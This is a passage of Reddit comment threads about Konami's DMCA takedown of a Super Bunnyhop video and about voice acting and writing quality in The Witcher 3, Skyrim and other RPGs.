 [deleted] [deleted] [deleted] [deleted] [deleted] It's pretty easy to get a DCMA takedown notice on a video.  All you have to do is claim to be something you aren't and fill out an electronic form.  Google/Youtube does not put real eyes on any of these until there is a response filed by the person who posted the video, so for all you all may know, *I could be Konami.* And if I remember right, disputing a DMCA gives you a strike on your account if they rule against you. Either Konami is dumb enough to not remember Day One: Garrys Incident or they're hoping that DMCA'ing this sort of thing will buy them time while they burn their company to the ground.

I honestly don't know which is worse. &gt;while they burn their company to the ground.

They don't give a fuck about video games anymore and want to get out. Do you really believe a company heavily invested in completely different parts than just gaming, and according to rumors starting to profit off of the legalizing of gambling in Japan, will "burn to the ground" because of a Youtube DMCA claim? Yes, a lot of Redditors who are only familiar with how businesses operate from a high school/college student video game consumer's perspective do think that this is a the equivalent of "burning it to the ground". Wouldn't chalk it up only to redditors. A lot of YouTube commenters and even Youtubers themselves completely ignore Konami's refocus on gambling and mobile. Same sort of thing. People on Reddit aren't categorically different from other people who talk about video games online. Or they remembered SEGA which did it and never even had to appologise to the people which got the strikes on their channel. They did have to back out when the channels that had legal help fought back I don't think a lot of people take SEGA seriously anymore Several Youtubers boycotted or boycott SEGA. Though, I don't think that disproves your point. I'm doubtful it's even a significant blip on SEGA's internal statistics.  Are you really under the impression that the Garrys Incident incident made a big enough impact to people outside of relatively small internet message boards? I would almost bet no one has even heard of the game there, let alone the controversy surrounding it. And even then, to have it affect what they do as a company is even more nonsense. As an avid gamer for the last decade plus, what is the "Garrys Incident"? Short form: early access game did not deliver as promised, was called out on it, creator blew up, cue Streisand effect It did much worse than "not deliver as promised". It was one of the worst games ever made. [Heres the video totalbiscuit uploaded explaining what happened](https://www.youtube.com/watch?v=QfgoDDh4kE0)

[And heres his video that was dcma'ed by the developer](https://www.youtube.com/watch?v=KjTa_x3rbJE&amp;feature=iv&amp;src_vid=QfgoDDh4kE0&amp;annotation_id=annotation_2716921017) Getting away from gaming isn't burning your company to the ground when they make more money making Pachinko machines. Actually, what really frightens me about all this is; *this probably won't go the way of Garry's Incident at all. This has the potential to be the opposite.* 

The reason indie developers end up absolutely slaughtered when they attempt this is because they don't have a lot of money; after they issue a false DMCA takedown, the fuse of a time bomb is lit. They have to take the issue to court if they feel they are actually being infringed upon. Since they don't have the money to do that, the argument ends there, and the video comes back shortly after. We've seen this process outlined by Total Biscuit, as well as in the Jimquisition, after enough false claims were made.

Konami absolutely *does* have the money to take this to court if they want to. I'm a new viewer of Super Bunny Hop (I like him a lot, he's very smart), but I'm willing to bet he does not have the funds that Konami does.

If Konami wants this to disappear badly enough, it can. It doesn't matter whether or not whatever they claim is legal or even correct, they only need to threaten it, because random Youtube users can't afford to risk a courtroom brawl any more than an indie game developer with a stick up their ass can. What's the OP going to do about it? the one thing I can see is that SBH has a lot of friends who have bigger channels then him, the TOVG guys who have an office and works with nintendo, Jim Sterling, and TB are all people who like his work and will probably work to try and deal with it. Also Polaris is owned by Disney now, so they have a Megacorp's worth of lawyers to back them up too. &gt;...DMCA'ing this sort of thing will buy them time while they burn their company to the ground.

They are categorically not burning their company into the ground. It seems clear they will produce only 2 core video game properties going forward (MGS &amp; Pro Evolution)

They are more than a games company. Much more even; George's video covered that too. [deleted] [deleted] https://www.youtube.com/watch?v=iMK-kajdgMA

And its back.

Would you look at that. Another case of someone abusing the DMCA system and getting burned by the public. Man. Its real good that this stuff is just isolated and not a consistent trend. I'm going to take this opportunity to say that George (creator of Super Bunnyhop) makes some of the most thoughtful analyses of video games I've ever seen. He doesn't have a schtick like some other reviewers, he's just completely focused on the material of the game and does a fantastic job picking apart mechanics, as well as industry news in general.

It is too bad Konami apparently wants war with such a humble guy. [deleted] This is nuts, I bet it was because Jimquisition mentioned George in one of his videos about Konami. Konami has a big fat hate boner for Jim and probably took out George just because he was mentioned. if thats true its incredible how petty a company can be. [Here is Jim's video right after George's video came out.](https://www.youtube.com/watch?v=ynl4sIFazmM) You can decide for yourself whether you believe Jim or not, but it's the only explanation I can think of that would have brought so much scrutiny to the video on Super Bunny Hop. You know what slowly dissolving the development team and demoting the director before the release means? There will be no post-release support.

I for one will wait at least a few weeks before even thinking about buying the game. Use of the DMCA in this manner is illegal.  It really aggravates me that there are no consequences for abuse. How did the video get back up? Did Youtube help the guy out or did Konami back down? Youtube helped him. They said Konami didn't provide enough information.

https://twitter.com/superbunnyhop/status/597857120604688384 LOL only fucking Konami can be so fucking incompetent they can't even abuse a DMCA takedown properly.  [**@superbunnyhop**](https://twitter.com/superbunnyhop/)

&gt; [2015-05-11 20:13 UTC](https://twitter.com/superbunnyhop/status/597857120604688384)

&gt; Ack! Scratch that! Just got an email from YT themselves saying the strike was "missing required information." Has that ever happened before?

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 I don't get it, I'm about 2 minutes in and don't see anything Konami can claim as their own content.

Anyone know how they could do this, aside from "Youtube is shit and is 100% automatic, with no checks on validity" ? Mirror - https://www.youtube.com/watch?v=YNSVhbsJyDQ I think the DMCA system need a complete overhaul.  
Maybe once your channel surpasses a certain number of subs (like 100k?) the company has to actually provide proof before they can take down your video.  
 Wouldn't that just penalise the little guy and ensure only the big Youtubers can do what they want? It would certainly benefit the bigger youtubers, but I think the system with the immediate takedown is in place to ensure that there are no people who illegally upload entire movies etc. (it would be pretty bad if a movie is up for a few hours) and bigger channels would probably not do such a thing I don't think the takedown of Bunnyhop video was automated, or else it would have been removed way faster (like the day it was uploaded). Konami saw the thing, didn't like it and filled a complain, abusing the DCMA system, a common thing on Youtube. It's not a "DMCA" system, it's youtube's own system to comply with the DMCA.

False DMCAs have legal repercussions.

False youtube takedowns are essentially a "nyeh nyeh I blocked your video for a month until I don't respond to the objection".

There is no way in hell google could keep up if they tried to have actual people sort through things, even over 100k subscribers. This is why it's automated, if they leave something up they could be found legally responsible as well.

If people want the DMCA changed, write to your representatives, although there is little chance much will happen. Trying to remember if I watched this video and was pretty sad because I wanted to learn more about this situation.  But I did remember watching this video, especially the part about Konami's gambling division and their investment and I'm guessing lobbying for the bill that will make gambling legal in Japan.  That was a "holy shit" moment for me and just screamed shady to me in my own values, as well as hitting me personally with the whole Kojima situation.

MGS:GZ and MGS:TPP are the last games I'm getting from Konami to support Kojima and prove Konami wrong. While I don't think it's immoral for a company to exit an industry they no longer have faith in, it speaks volumes how they are going about it. 

Apparently no one ever told Konami the adage "never burn bridges"  because they seem dead set on cutting ties with nearly everyone that helped them succeed in digital entertainment. 

I really hope the Pachinko money was worth it, especially considering gambling's legality in Japan is still up in the air.  The Streisand Effect in full force.  When will these people learn? In before the Konami code is revealed as an ancient demonic prayer in a forgotten runic language that we've all been unwittingly invoking all these years. Its funny when people act like censorship can only be done by the government, when nowadays we have examples of people and corporations trying this shit all the time. Luckily the internet is leakier than a capsized titanic so it never works.

Its funny, i've heard some silly shit about the Yakuza pressuring Konami to go into gambling more, as they get a bigger cut. It sounds crazy, but then again the Yakuza are into a whole ton of shit over there. That or Kojima was going around flaunting his *big boss* too much. As the world keeps moving on, the line between corporations and government is becoming so thin as to be non-existent. [deleted] DMCA will be used to protect copyrights, they said. And now they are used to silent unpleasants opinions.  What a farce of the USA legal system. Such a shame. People like him put so much effort into their work, only for it be taken away by a damn DMCA. Wtf is wrong with them? Does anyone on YouTube even cover Konami games anymore? What little they have left anyway. Wouldn't you think that, given how businesses operate and how fast people can abandon ship as paying customers that they would see the reactions from their decisions and start course correcting? Hello Streisand effect. Konami just made this small video huge by trying to censor it. Congratulations. Konami, the fuck are you doing? You can be a business without being a whore. /u/cinemasins taught me that. You're pissing off both kojima and the internet? Are you insane? Do you just want it to end? You're not a bank, ok?  You won't be bailed out when you fuck up. Is there a summary somewhere for those of us who haven't seen the original video There's a YouTube mirror elsewhere in the comments here, I recommend watching it, and subscribing to Super Bunnyhop, its an awesome channel. Damn. I remember back in the day when Konami's little intro graphic meant that game we just loaded into the NES/SNES was going to be worth the rental price for the weekend.

Times sure have changed...
 950!? What did Oblivion have, 15 or so total? VA in games has come a long way.

edit: the article states 950 "speaking roles." I'm pretty sure some voice actors must have handled multiple, perhaps many dozens of roles. There weren't 950 voice actors. There were 950 distinct roles. That makes more sense because I swear every other male was Warden Blackwall from DA:I. they got Tywin Lannister to do the emperor. here's the [list](http://www.imdb.com/title/tt2993508/fullcredits?ref_=tt_cl_sm#cast) Charles Dance is so good at playing royalty. he's a fkn boss Damn 77 voice actors still? Most doing a single character, just wow. Yeah, great thing I love Blackwall's voice. Dude has one of the best "medieval asshole" voices ever. I often just walk around my house talking like Blackwall. "Guess the Wardens forgot to vacuum again, fucking Darkspawn" Hey man, if you can pull of at least a half-decent Blackwall, I won't judge. Is he also the nights watch trainer guy in the telltale game of thrones? Here in the UK he seems to be getting more non-game work - specifically lots of Sky Sports adverts. It's a bit odd hearing boxing advertised by the man who broke my heart. I mean... my inquisitor's heart. 

Ahem. Is that the same guy as the "advice head in a box" in RTW:2?  Guy has a booming, shakespearian voice that's really excellent..but its so excellent its impossible to not recognize he's about 10% of male characters in the game. It sure has, Oblivion had [18 VA](http://www.uesp.net/wiki/Oblivion:Voice_Actors) and Skyrim had [over 70.](http://www.uesp.net/wiki/Skyrim:Voice_Actors) [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] You couldn't really tell in Skyrim though. I remember one example with the Thieves Guild questline, the main villain has that voice actor with the raspy voice, just after talking to him you are tasked with talking to someone who can help bring him down, and this new guy has the same voice actor. Then you talk to someone else in the same or the next quest with the same voice actor. And then Belethor in Whiterun has the same voice actor too. I really think they used only a few voice actors for most characters and used a bunch for just special characters. The worst were the beggars for me. They'd beg with an East London accent, and then move to a doddery old lady if you say anything else to them. Honestly if they had just instituted a random pitch and timbre adjustment for all the 'throwaway' actors that would just tweak it a HAIR it would help.

But the real solution is hiring more voice actors. Bethesda makes fucking tons of cash off the Elder Scrolls games, but they seemingly refuse to actually reinvest it INTO THE GAMES. They're all still ugly when they come out, have shit writing, poor animations, and the same five voice actors they had in their last game. &gt; They're all still ugly when they come out, have shit writing, poor animations, and the same five voice actors they had in their last game.

Been noticing a lot of Skyrim hate on Reddit over the last few months, and I don't fully understand why. It is almost universally regarded as one of the best games of all time...can we really pick it apart and call it shit so easily? 

Skyrim definitely wasn't ugly at the time of its release, nor is it now. It was never Crysis 3, but it didn't pretend to be either. Even if it was middle of the pack graphically, that's by no means ugly. Same with writing. Bethesda games can struggle with pacing because of the open world design, but there are plenty of interesting and engaging quests in Skyrim. Even if we say that, on average, the writing in Skyrim was fairly mediocre, that's a far cry from "shit". 

Anyway, you're entitled to an opinion of course. But I find it hard to justify such a hyperbolic critique of Skyrim. Maybe the game wasn't to your tastes. But was it a poorly made cash grab as you're suggesting? Definitely not.  After playing it daily for 4 years, the fault really start to become apparant. Such trash! This is exactly the actual problem here. People put x-hundred hours into Skyrim and then say "oh, what a garbage game." It has definite faults, and things that grate on me, but god damn if it doesn't still pull me in. I can get lost in that game like I can with few others.  2/10, would not play again. Until I pick it up in a month and put another 300 hours in.  &gt; there are plenty of interesting and engaging quests in Skyrim

I've played a lot of Skyrim, and I really do like the game, but I have to disagree there. There were barely any interesting quests, especially compared to Oblivion or Morrowind. The vast majority of quests ended up being "get to the end of this dungeon", and most of those dungeons were filled with nothing but draugr. Even the guild questlines were often like this. There were a few that were done well - the Cidna Mine questline and the Frostflow lighthouse quest come to mind - but for the most part, the quests were very bland.
 Great games deserve to be criticized for their flaws. Skyrim is a monolithic game, just fucking awesome. But it has poor balance between Mage/Melee combat (high end Melee is just way better than being a Mage). The stealth elements could be better. The intro is drawn out and clashes with the open world environment of the game. And of course the endless bugs on and after launch. 

Great game, obviously has flaws. We're seeing more of those flaws be discussed because the game is getting older and not everyone looks at everything through rose tinted glasses even if they love it.  &gt; We're seeing more of those flaws be discussed because the game is getting older and not everyone looks at everything through rose tinted glasses even if they love it.

That's a fair point. But many of these criticisms don't come in the same form as your post (i.e. "Skyrim is a great game, *but*...), and are completely out of proportion with the reality of things. That's what I'm objecting too. These over-the-top claims that Skyrim is completely garbage. 

No game is perfect, and Skyrim especially. It launched with more than its fair share of flaws, some of which mods can't even fix. But the game isn't broken. It isn't "borderline unplayable". No single element of it is "complete trash". These are incredible exaggerations that add no value to worthwhile discussions about the game. 

Obviously we can cut out the praising bit if we're critiquing the game. You don't need to pay Skyrim a compliment before you point out a flaw. But it's the hyperbole that is the problem in these discussions. Probably because Skyrim is so popular and well-respected, people feel the need to pretend like its the worst and most overrated game of all time when they critique it. And that's not fair to anyone. It discredits the complaint of the poster, and it devalues earnest discussions about the game.  Is it really universally regarded as one of the best games of all time? I've heard that particular opinion very rarely. Most people I've talked to found it pretty boring and disappointing, preferring the other games in the series to Skyrim. Depending on how much stock you give to ratings, according to metacritic Skyrim is tied for 3rd best of all time on Xbox 360, 9th best game of all time on PC, and ranks 21st for PS3 (probably reflecting the poor quality of the port, but still no slouch of a score at 92/100). By all accounts that is universal critical accliam.

Let's say that review scores are biased though, and padded by outlets that give out a lot of 10/10's for major releases. Skyrim is still the [~25th best selling game of all time](http://en.wikipedia.org/wiki/List_of_best-selling_video_games), and would likely rank higher on that list if we disqualified games bundled with consoles, etc. 

But lets say that sales don't justify how good a game is and look at how frequently the game is played instead. At the time of this post, [Skyrim ranked as the 10th most popular game on Steam with over 38,000 players](http://store.steampowered.com/stats/). *And this is for a game that was released in 2011*. Even the Witcher 3, which has similarly been showered with accolades since it launched last week, only ranks 5th on that list, with about 63,000 players. Only 3 games on that list are older than Skyrim: Team Fortress 2, Civilization 5, and Garry's mod. And I'd say that the first 2 of those 3 games equally qualify for "classic" status, not unlike Skyrim. 

Let's not forget that Skyrim is singleplayer too, with no online component. So while we might ascribe its enduring popularity to its active mod community, let's not forget that this is probably the most successful singleplayer game of the past 5 years, and note that it's stayed alive and culturally relevant despite refraining from the usual tactics to keep players tethered to the game. 

**TL;DR: Yeah, I'd say it is pretty easy to substantiate Skyrim's status as one of the best games of all time. Almost by any criteria, be it financial, critical, or cultural impact, Skyrim sits near the top on just about any list**   Skyrim wasn't all that bad looking when it came out. I think you overestimate what console games looked like 4 years ago if you think that.

I totally agree about the pitch and timbre adjustment, though; it's something I've thought about before and I don't see why games don't try that. If you hire talented voice actors who can do different types of voices, you should be able to get a ton of different sounding characters out of one guys voice. [deleted] Nah, Karliah had a very distinctive voice, as did most important characters. and Arnold Schwarzenegger [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] And Farkas! Don't forget Farkas! The voice actor is my best friends uncle. He signed a picture of a screenshot of Farkas and called me on the phone to tell me I'm a whelp for my birthday.  Thanksgiving must be interesting for your friend. Everyone is gathered around the table when suddenly:

"Some people don't think I'm smart. Those people get my fist. But you, I like." They got Max Von Sydow for that blade guy who's name escapes me. Esburn. But his voice seems to change completely half way through or something...dunno if it was an actor or vocal change [deleted] [deleted] [deleted] Syria had 70?! More like 5 &gt; Syria had 70?!

That's an interesting autocorrect. Haha just upgraded my phone. Still have to struggle to type duck Wait, duck or duck? Does "speaking role" really translate to voice actor? Because the latter is not mentioned in the game. There is definitely a massive amount of voice actors in the game and I haven't noticed any obvious duplicas (like the actor in Skyrim who did Farkas and every other nord), but I guess that "speaking role" means NPC with unique dialogue rather than voice actors. &gt; and I haven't noticed any obvious duplicas

There's that peasant guy that sounds like he has throat cancer, the one that tells Keira how ill their cow is when you first go to her house, pretty sure I've heard him a few times The really throaty guy who sounds like Ralph Ineson? The game is fully voiced in 7 languages. I assume you can divide the voice actors at least on that number. I don't get why everyone is arguing over this when there are freaking credits in the game.

Here are the credits, time tagged at the voice acting part, starting with english.

https://youtu.be/3LJj2cY3FZ8?t=304

Maybe it took 950 people total for ALL languages. Hmm, it lists 19 voice actors for the English localization, and 8 additional actors under "Additional Voice Overs (Trolls)" at 7:20.

Anyone notice any other English VO credits?

edit: Looks like 7 languages with voice actors, for a possible total of 141 voice actors.  I'm not seeing any additional voice actor credits. [Polish website about actors](http://www.filmweb.pl/videogame/Wied%C5%BAmin+3%3A+Dziki+Gon-2015-678629/cast/actors) shows 39 actors in Polish version and 25 in English. It's 3rd party source and it's possible the list isn't full. Yeah but one good voice actor can fulfill dozens of different roles. Like 80% of the characters on the Simpsons are voiced by two guys. Grey DeLisle has done like 300 roles.

The voice actors in Elder Scrolls games sound like they aren't even professional voice actors. They just do some silly accent in their normal speaking voice and that's all they know what to do.

  There's this voice which I'm 95% sure is Ralph Ineson, and I hear him all over the place. That's actually my biggest gripe. I hear that guy absolutely everywhere. I've no idea if it is Ralph Ineson but it sounds bang on exactly like him.

The other big problem I have with W3 is I see a LOT of the same faces. They almost always have different hair or whatever, but it's copy/paste the same face and it really takes me out of the game partially because W3 is a really well rendered and realized world and minor things like hearing the same voice actor repeatedly or seeing the same faces on different people is really jarring.

Brilliant game though. Seriously loving every minute. I saw that "950 actors" line and I burst out laughing. You can notice repeating voice actors all the time. Practically all skelligers are the same 3 people and there's some guy with a raspy voice that seemed to voice the entirety of whoreson's gang and like 90% of velen's and novigrad's peasantry.  Oh god that fucking guy with the raspy voice. I honestly don't mind most VA that use a similar voice for different character, but this fucking guy... It's impossible not to recognize his voice, they really shouldn't give him so many different characters. Let's not excuse Bethesda's pathetically lackluster investment in good writing and voice acting by claiming that VA in games has come a long way. From 15 in oblivion to over 70 voice actors in skyrim. And skyrim is nearly 4 years old. Sounds like a good improvement going on.  I'm really looking forward to what the next Elder Scrolls game can do in a couple years, with modern consoles and computers. There were voice acted games with far more voice actors for smaller and similar size scripts before Oblivion.  And yet they weren't as good or we would be talking about them instead of Oblivion. Or they were just different types of game.  The original "Gabriel Knight" game had a voice cast of about 20 people and that's a tiny game, comparatively speaking. There are many ways in which I could describe Oblivion's voice acting but 'good' is not one of them. How can a script be smaller yet similar size? I can't think of any of these games you seem to know of, except for Kotor maybe, which obviously had a pretty small cast, and used repeated "alien" dialog for  most other things. GTA might be the only game that rivals Elder Scrolls/Bioware RPGs in terms of voice acting, and that game is definitely the exception and far from the rule. For comparison SW:The Old Republic had around 200 voice actors and 200,000 lines. Not sure if there's a number for word count.

http://www.pcgamer.com/star-wars-the-old-republic-scoops-guinness-world-record-for-voice-acting/ Obvious MMO problems that game had aside, first time going through each story was super fun because of the voice acting. It was the best single player mmo I've ever played Playing it now f2p sucks because I just want the stories, and exp is cut for non subs so I have to grind to level when I just want to see how my inquisitor story ends up Because it should never have been an MMO. It should have been a single player RPG. RIP my hopes for KOTOR3 :( I just wanted to power through the main story but the mmo aspects made me need to do sidequests. funny how I've been hearing about they are doing a main quest xp boost promotion, I guess I wasn't the only one Yeah it's a 12x exp boost, essentially you can hit 55 or 60 by doing only the storyline quests. Almost pulled me back in until I saw all the micropayment stuff they bolted on. No real interest in going back to it unfortunately.  [deleted] [deleted] This just proves even more that cd projekt red spared no expense in making their game. I have played for over 60 hours and barely scratched its surface. Hopefully they are able to make the costs of production back in folds and come out with another game with such clear passion and love poured into it. I feel like a jerk for getting bored after about 10 hours.  I keep seeing these posts about all the dedication and hard work that went into a game that I'm struggling to enjoy. You shouldn't. The Witcher 3 is a great game, and a lot of effort was clearly put into creating it, but that doesn't mean that you need to like it. Not everyone will enjoy any one thing. If you don't like the Witcher, then don't force yourself to play it just because you feel like you SHOULD like it. If it's not for you, it's not for you, and that's ok. At the same time, there are some games that people have raved about that I tried to play only to quit a few hours in... then when I went back to try again a few months or years later I devoured it just like everyone else said they did.  Sometimes it just comes down to whether or not you're in the mood for a particular kind of game or any game at all at the time and the same often applies to books as well. So just keep in mind you can always come back to it later and when you eventually do, it might surprise you. Might just be expectation too. You go into a hype game expecting the world and make yourself keep playing even though you're not into it at the moment, and it's not scratching the itch for you. Then you come back ages later, not really expecting much from it, just to kill some time, and with expectations gone, you really enjoy it. I went out of my way to avoid hyping this game in my mind, I avoided just about all the lead-up teasing, news, anything related. 

It was like navigating a minefield, but it was worth it when I look back and think of all the times I got a new game just to be initially off-put by it not living up to my unrealistic expectations. 

I feel like I've been pleasantly surprised by new things, where I might have otherwise found those things underwhelming. Hype can definitely do that to me as well. For example Pillars of Eternity got ~5 hours of play time from me and is sitting there waiting for me to come back. I'm sure I will and I'll be really impressed by it but until then It'll be waiting.

Another was bioshock. Had to play that like 3 times to get through to the end.  Funnily enough it was the exact opposite for Pillars with me... I love, love, love BG1/BG2/IWD/IWD2/PS:T (and replay them all every few years) but for some odd reason I just couldn't get into the BG1 enhanced edition when it came out so it killed all the hype I had for Pillars.  But when I saw Pillars for cheap at GMG a little while ago I thought 'at that price why not give it a try'... 75 hours of playing in a week later and I just started my second play-through but this time on Path of the Damned . So I think you're spot on that hype has a lot to do with it too. I was one of the backers. Kind of over hyped it for me. I'll love it when I come back to it I'm sure.  Same, backed it almost immediately, yet have only put like 4-5 hours into it if that. Don't regret backing it, just not quite in the mood for such a game at the moment. I feel like once the winter months come along, I'll be ready for a nice long cRPG. You just described my experience with Mass Effect. I played the first one when it came out and was unimpressed, but I bought the trilogy last year and played the shit out of it. I loved every second!  I couldn't believe that I didn't like it to begin with That pretty much happened to me with Witcher 2. First time I played it about a year ago or 2, I thought it was OK, left after an hour or so.

Now re-downloaded it to prepare for W3 and I got fucking hooked. I simply couldn't stop playing it, completed it in 3 days (24 hours total, most were the first day), and I'll be honest here, I very well would've done it in 2 days if I could have.  This hits home with me regarding books and reading in general. I'm reading ASOIAF and I put the books down for like a year because I was bored, only to pick them back up a year later and devour them. Not every game is for everyone. Don't worry about not liking something that's popular. [deleted] [deleted] [deleted] [deleted] The Witcher seems like it's going to be one of those love it or hate it games. As someone who loves fantasy books the story and world is exactly my style, and as someone who loves Dark Souls the preparation and the simple on the surface combat really does it for me. That being said a lot of the game seems pretty clunky (movement in particular) and it relies heavily on cutscenes and dialogue, easy to see how some people are getting bored. I finished the bloody baron quest line and I just can't find the motivation to continue. I don't see the same game as, what seems like, literally everyone else. Any every time I mention this in anything about CDPR or Witcher, I get downvoted. Not every game is for everyone. I think it's a fucking brilliant game, but the inventory makes me want to gouge my eyes out. So does the swimming.

I also wish the "witcher stuff" was more important. Even on Death March I can faceroll 90% of encounters. Sword, Signs, or Alchemy, the build doesn't really matter once you get past about level 10. A tough encounter might make me use a couple potions, normally I just roll with a decoction or two. I wish I had to have oils and potions prepared for specific threats. I wish there was a bit more variety to boss monsters. I liked using the different bombs as alchemy, too bad the inventory system is awful. They need to add a hotkey bar for swapping bombs, or even just a "favorites" tab in the inventory. I spent more time in the inventory screen than I spent fighting as a bomb build.

Even with all of those gripes, this is my favorite game to come out in years. The stories, characters, and themes are just all fucking spot on. The side quests are *infinitely* better than the shit from dragon age or skyrim. Really it's the first RPG where I feel the open world and storylines were both just done fantastically well. The only other game that came close for me was Red Dead Redemption. The inventory and the amount of menus, as well as some of the janky and awkward animation. Also, falling 4 feet should not kill me. I have had several set backs because of this bullshit. Though the lack of a more recent save is my fault, but 4 feet? Really? This guy who was trained for years in swordplay and acrobatics, is unable to fall four feet without dying or at the very least losing tons of health. For fall damage, hit "B" or whatever your sidestep button is to roll when you hit the ground. You can fall a good distance without taking damage using that method.

But yeah, fall damage is a bit out of whack. He's got a bad knee, besides you can roll and essentially negate most fall damage.  Did you like the Baron questline? I loved it but absolutely hated the next portion of the game in Novigrad. It was extremely boring to me, but everything since then has been great again. Honestly there is no such thing as a game for everyone. Maybe your just not a fan of the genre or need to play game in a different way. Try going for side quests if you have not or if you have, just do main quests and explore world. Try changing your gameplay up and if you just cant get into it. Wait for a few mods or improvements to game and maybe you will enjoy it in a new light later on. Well they already have their next game, which is Cyberpunk 2077. But they won't be focusing on it for a couple years. And it shows. The Witcher 3 is an incredibly beautiful game, not just visually, but in so many other ways too. You hardly notice the difference from the main quest and the side quests since it all has so much depth and detail that blends so well into the fantastic game world. It's also one of the first games in a really long time that haven't made me feel like a "player" in a world that revolves around me. I really like how the sidequests in an area share their lore. 

Sure if you are in a hurry or don't bother for that sort of thing, they make for great stand alone tasks, but they often give subtle context to one another and tie each other's loose ends in unexpected ways. 

 And the length of the side quests is pretty good too, you can play 1 or 2 per sessions and have the equivalent of an episode of some fantasy series that doesn't exist. This is a big ass game. It's a shame that I'll probably never hear all the dialogue because it's extremely well written and acted.  It is about the same amount of text as the main Lord of the Rings Trilogy which sits about ~470000 words.

Witcher 3 has less text than Final Fantasy VII which has ~600000 words. But FF7 had zero voice acting, which adds up in time and costs very quickly. Where FF7 lacks in voice acting, it makes up for in convolution. What was convoluted about FF7? They explain things rather well and it was very straightforward. I played the game when I was like 9 and understood it just fine. I'm currently playing through FF VII for the first time ever and I'm about half-way through the second disc. For some reason it doesn't seem that the game has that much text in it or it's very well hidden unless you go exploring. FFVII is actually pretty famous for having a ton of secret cutscenes that very few people find on their first playthrough. A lot of them are pretty important to the story too concerning stuff like Aeris' parents or what happened to Cloud and Zack after the incident at Nibelheim. Then of course you have stuff like Yuffie's big sidequest in Wutai or Vincent's very existence. Not to mention all the various Golden Saucer dates. Barrett is my waifu! Why would the dialogue being well written and acted prevent you from hearing it all?!?!? Because the game is absolutely massive, I'll probably never get around to witnessing all the branches of the dialogue trees.  Hence my obsession exploring every inch of velen. Nearly 25 hours in and I'm about to enter Novigrad for the first time. 55 hours in here. Haven't left for Skellige yet. Half the map still covered in question marks. It's so big I've resigned myself that I'll likely never finish it. I'll always have something new to see in it.  Even if you complete a 100% play through, you'll probably only see about a quarter of the script.  The rest is along paths that your choices veered away from.

That's where Story mode is going to be fun after you finish the first play through.  Check out some of those other paths the quick way. I'm telling myself it's totally okay to not do everything. Even though I'll still do everything by the end of it... The problem is that even if you explore every inch, you'll still miss dialogue due to the choice system. RPGs kill me. And the 36 different endings. I think the original guy was pointing out that your sentence was ambiguous, due to lack of grammar. [deleted] [deleted] In fairness, I don't see myself completing more than maybe 70% of the content. Not because I'll get bored, because its excellent, but there's just soooooo much. Uhhh does nobody care that the voice actor claim in the title is bullshit? It's 950 "speaking roles," not voice actors by a long shot. It's OP's vault. The article says "950 roles" as in "950 different in-game voices/characters" not "950 actors in real life" but OP changed it to 950 actors. THIS is how you voice cast a sweeping, epic RPG! I'm a voice actor myself, and nothing takes me out of a game more than sloppy VO work, or when the same actors keep popping up over and over within one game. Bethesda should take note for their future projects-- yes it's expensive and time consuming to do this kind of audio direction, but for heaven's sake give some more actors work and hire more than 10 people to voice every single character in Tamriel.

The Witcher 3 benefits from this immensely-- every character feels unique and alive thanks to diverse and incredibly well directed voice talent, even random peasants become memorable! Even in Witcher 3 you start noticing lots of the same voice actors, especially the ones with very distinctive voices (that one very deep/hoarse male voice comes to mind). But then there's not really a way to avoid this. Though not using very distinctive voices for common peasants would help somewhat. 

Just a minor thing anyway, overall I'm very pleased with the VO work in this. I know exactly the voice you're talking about. I've only heard him on three or four characters but each time I recognize him, whereas I've probably heard other voices reused more times without noticing. The general merchant type's "Greetings" comes to mind here. The merchant archetype is basically as close as the Witcher series gets to Nurse Joy in terms of reused assets Bahahaha, you aren't paying attention to all the other NPCs? Because EVERY SINGLE peasant NPC who's not part of a large quest is reused numerous times. Hell, the little kids from the mandatory story quest in the bog are reused -- I think there are like 5 kids in the world. Also like one old peasant lady. I keep seeing the same character model for the little girl that Ciri meets all over the place. She even has the same line of idle dialog, something like "Thhhisstle... thistle!" and I'm like wait, shouldn't you be in the Baron's kitchen? Those voice actors you hear over and over in multiple roles can be incredibly important though. Like for Arkham City's mooks. I think there must be like, 4-5 main voices for them, but they make up most of the spoken lines, and they're extremely good at it. &gt;when the same actors keep popping up over and over within one game.

Well Witcher 3 has that happening very often, even more common in cities. You'll hear Letho's VA, Ivoreth's VA, and Roche's VA. Too be fair they try to spice up their voices in some degree most of the time, still their voices are just too recognizable. 

The most hilarious one is hearing Roche's VA come out of a generic soldier serving under Roche.
 I definitely noticed Iorveth a couple times. He's really just too distinctive to get away with being a random voice in the game. &gt; or when the same actors keep popping up over and over within one game. 

I've noticed two actors popping up multiple times. One of them being the same guy who voiced Roche in TW2. The other one I just remember clearly his rather deep voice. Either way, there's a bit of the same actors popping up over and over within one game. Understandable and I'm not bothered by it myself, but it's there.  Whoever did Warden Blackwall's voice from DA:I voices a lot of peasants in this game. He tries to vary his voice a little for each character so it's not obvious, but I picked it out pretty quick. Not that it's bad, he has a great voice for gruff characters. Blackwall is my favorite companion in that game.  I notice similarly constructed NPC faces popping up more frequently than I do voices that sound familiar.   Yeah, it was super jarring when at one point I, by coincidence, did two contracts back to back which were offered by identical women Haven't noticed it with adults, but I've seen the same 4 or 5 toddlers all around the world.  [deleted] Well, I wouldn't be surprised if the game had a huge amount of voice actors, but I highly doubt there are actually 950 individual people voicing all the characters.  I think OP misread the article when writing that title. Yes, god damn as much as I love Fallout 3, the VA was terrible most of the time, and every. single. male. character. had the same voice. I've been playing through Skyrim again and I've been noticing the VA that does Belethor is EVERYWHERE! His voice is great, but they definitely could have used him a little less. [deleted] Counting translations? Most likely. While not all voiced out, both Baldurs Gate 2 and Planescape: Torment had over 1,000,000 words of dialogue + text. I fucking love The Witcher 3, all the voice acting and facial cues are so damn good. Constantly while watching them talk I see a little raised eyebrow here, or a little slight tilt of their lip, little details that add so much to the character and tell you so much. I love how polished to game feels, CDProjekt Red should feel truly proud of what they've made And they did a long RPG without filling it with meaningless padding [deleted] [deleted] [deleted] I'm just surprised at learning an average novel is under 100k words.  That seems like it'd be a really light book, my favorite series averages ~300k per volume. What's your favorite series? Wheel of Time, by Robert Jordan.  The whole series is 14 books and a prequel novel, totals almost 4.4m words.  And to be fair, it does definitely drag on in a few spots, especially in the 